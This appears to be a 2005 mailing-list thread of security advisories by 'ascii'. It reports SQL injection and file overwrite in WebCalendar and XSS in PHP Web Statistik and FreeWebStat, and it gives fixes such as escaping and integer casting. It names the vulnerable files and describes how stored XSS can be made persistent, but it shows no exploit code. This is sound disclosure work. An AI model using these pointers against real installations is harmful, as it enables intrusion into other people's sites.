or this type of stuff, put a beautiful
mysql_real_escape_string on each string passed to the db
and cast integers (int)intval($_GET['id'])

seems KAPDA Researchers researched this 'vuln' too fast : )

ascii -

Re: WebCalendar Multiple Vulnerabilities

2005-11-30 Thread ascii

Paul Laudanski wrote:
I too tried contacting the vendor but received no response.  Your timing 
of vendor notice and vul'n release are fast unfortunately.  Taking a look, 
simple functions in PHP can be called upon to fix those issues.

thanks Paul for the cooperation : )

i'm sorry i hadn't updated the advisory but now i done

* * * *


We had a response from Craig Knudsen, the project leader, on 20051128
night. The same day the fast Craig resolved 3 of the 4 issues in the
REL_1_0_0 branch of CVS, so soon a new version (probably 1.0.2) will be
released to the public.

* * * *

also on the sourceforge project site there are these posts related to
this advisory (thanks Craig for the links)

ascii -

WebCalendar Multiple Vulnerabilities

2005-11-28 Thread ascii

WebCalendar Multiple Vulnerabilities

 Name  Multiple Vulnerabilities in WebCalendar
 Systems Affected  WebCalendar (verified on 1.0.1)
 Severity  Medium Risk
 AuthorFrancesco “aScii” Ongaro (ascii at katamail . com)
 Date  20051128

WebCalendar is vulnerable to four SQL Injection (files activity_log.php,
admin_handler.php, edit_template.php and export_handler.php) and one
local file overwrite (export_handler.php), input validation will fix.

Advisory released on 20051128:
WebCalendar Multiple Vulnerabilities

Php Web Statistik Multiple Vulnerabilities

2005-11-28 Thread ascii

PHP Web Statistik Multiple Vulnerabilities

 Name  Multiple Vulnerabilities in PHP Web Statistik
 Systems Affected  PHP Web Statistik (verified on 1.4)
 Severity  Medium Risk
 AuthorFrancesco ‘aScii’ Ongaro (ascii at katamail . com)
 Date  20051119

PHP Web Statistik is vulnerable to javascript and HTML injection using
the unchecked $lastnumber variable, proper input validation will fix.
Just place an intval() at the right row. Other vulnerabilities has been
discovered later.

Advisory released on 20051119:
Php Web Statistik Multiple Vulnerabilities

Free Web Stat Multiple XSS Vulnerabilities

2005-11-28 Thread ascii

FreeWebStat Multiple XSS Vulnerabilities

 Name  Multiple XSS Vulnerabilities in FreeWebStat
 Systems Affected  FreeWebStat (verified on 1.0 rev37)
 Severity  Medium Risk
 AuthorFrancesco aScii Ongaro (ascii at katamail . com)
 Date  20051125

FreeWebStat 1.0 rev37 (the last version at the write time) is vulnerable
to multiple XSS. The impact is a little bigger since datas will be
stored in a flat file and the result of a single query will persist for
some time on the backend. A well-timed loop of requests will assure the
XSS to be permanent.

This can be used to inject arbitrary JS code into the page and make the
JS pseudo-permanent, so other users will execute the JS without the need
of any special url.

Advisory released on 20051125:
Free Web Stat Multiple XSS Vulnerabilities